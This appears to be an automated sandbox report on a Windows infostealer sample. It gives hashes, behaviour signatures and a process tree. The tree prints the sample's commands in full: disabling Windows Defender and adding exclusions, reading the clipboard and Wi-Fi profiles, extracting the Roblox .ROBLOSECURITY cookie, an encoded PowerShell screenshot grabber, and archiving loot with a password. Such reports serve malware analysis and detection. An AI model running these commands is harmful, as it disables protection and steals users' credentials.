Analysis

  • max time kernel
    94s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-01-2025 06:18

General

  • Target

    006d680fdd592bcabb6ba965c61a82c2c97c1e30f5845984b5a5fb6b358316b4.exe

  • Size

    7.5MB

  • MD5

    17e85e39754db87356121c00e17d3096

  • SHA1

    ab01140ebc61d625989f842eb2db9bdc79c15444

  • SHA256

    006d680fdd592bcabb6ba965c61a82c2c97c1e30f5845984b5a5fb6b358316b4

  • SHA512

    40e90e9148f1442b9a74d6f31febf0aa6a9d1e7761e6b7d2b2f340f6ece456386ae5abd991ca5c09fd610e0947357f677ce24756e0b906a26be8dd74f2914a3a

  • SSDEEP

    196608:HsunqZzwfI9jUC2XMvH8zPjweaBpZ0cX2ooccXK7oSr:/BIH2XgHq+jq93Yoa

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • UPX packed file 60 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\006d680fdd592bcabb6ba965c61a82c2c97c1e30f5845984b5a5fb6b358316b4.exe
    "C:\Users\Admin\AppData\Local\Temp\006d680fdd592bcabb6ba965c61a82c2c97c1e30f5845984b5a5fb6b358316b4.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4512
    • C:\Users\Admin\AppData\Local\Temp\006d680fdd592bcabb6ba965c61a82c2c97c1e30f5845984b5a5fb6b358316b4.exe
      "C:\Users\Admin\AppData\Local\Temp\006d680fdd592bcabb6ba965c61a82c2c97c1e30f5845984b5a5fb6b358316b4.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4160
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\006d680fdd592bcabb6ba965c61a82c2c97c1e30f5845984b5a5fb6b358316b4.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2728
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\006d680fdd592bcabb6ba965c61a82c2c97c1e30f5845984b5a5fb6b358316b4.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4668
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2804
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:856
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please open roblox', 0, 'Roblox Process Not Found!', 0+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4376
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please open roblox', 0, 'Roblox Process Not Found!', 0+16);close()"
          4⤵
            PID:3568
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3676
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:4568
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4212
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:116
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3992
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
            4⤵
              PID:4524
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2896
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              4⤵
                PID:1836
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4140
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                • Suspicious use of AdjustPrivilegeToken
                PID:1948
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4632
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                PID:4832
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1908
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:1960
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1632
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:388
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1560
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:636
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              3⤵
                PID:3328
                • C:\Windows\System32\Wbem\WMIC.exe
                  WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                  4⤵
                    PID:4556
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                  3⤵
                  • Clipboard Data
                  PID:632
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell Get-Clipboard
                    4⤵
                    • Clipboard Data
                    • Suspicious behavior: EnumeratesProcesses
                    PID:5080
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                  3⤵
                    PID:4032
                    • C:\Windows\system32\tasklist.exe
                      tasklist /FO LIST
                      4⤵
                      • Enumerates processes with tasklist
                      PID:2328
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:376
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:992
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                        3⤵
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:4880
                        • C:\Windows\system32\netsh.exe
                          netsh wlan show profile
                          4⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Network Configuration Discovery: Wi-Fi Discovery
                          PID:4668
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "systeminfo"
                        3⤵
                          PID:3572
                          • C:\Windows\system32\systeminfo.exe
                            systeminfo
                            4⤵
                            • Gathers system information
                            PID:2288
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                          3⤵
                            PID:1272
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                              4⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:3048
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gkzbnfrq\gkzbnfrq.cmdline"
                                5⤵
                                  PID:4960
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC728.tmp" "c:\Users\Admin\AppData\Local\Temp\gkzbnfrq\CSCEA0FC54965C147CC9BD979689632C16F.TMP"
                                    6⤵
                                      PID:760
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                3⤵
                                  PID:4568
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    4⤵
                                      PID:4524
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    3⤵
                                      PID:3704
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        4⤵
                                          PID:4316
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                        3⤵
                                          PID:2004
                                          • C:\Windows\system32\tree.com
                                            tree /A /F
                                            4⤵
                                              PID:4360
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                            3⤵
                                              PID:3632
                                              • C:\Windows\system32\tree.com
                                                tree /A /F
                                                4⤵
                                                  PID:2712
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                3⤵
                                                  PID:3404
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    4⤵
                                                      PID:4444
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                    3⤵
                                                      PID:3216
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                        4⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:3044
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                      3⤵
                                                        PID:2488
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                          4⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:2464
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "getmac"
                                                        3⤵
                                                          PID:4588
                                                          • C:\Windows\system32\getmac.exe
                                                            getmac
                                                            4⤵
                                                              PID:4680
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI45122\rar.exe a -r -hp"Cribry10" "C:\Users\Admin\AppData\Local\Temp\vgVr8.zip" *"
                                                            3⤵
                                                              PID:4668
                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI45122\rar.exe
                                                                C:\Users\Admin\AppData\Local\Temp\_MEI45122\rar.exe a -r -hp"Cribry10" "C:\Users\Admin\AppData\Local\Temp\vgVr8.zip" *
                                                                4⤵
                                                                • Executes dropped EXE
                                                                PID:3496
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                              3⤵
                                                                PID:2584
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic os get Caption
                                                                  4⤵
                                                                    PID:4944
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                  3⤵
                                                                    PID:912
                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                      wmic computersystem get totalphysicalmemory
                                                                      4⤵
                                                                        PID:2580
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                      3⤵
                                                                        PID:4576
                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                          wmic csproduct get uuid
                                                                          4⤵
                                                                            PID:1952
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                          3⤵
                                                                            PID:3776
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                              4⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:1576
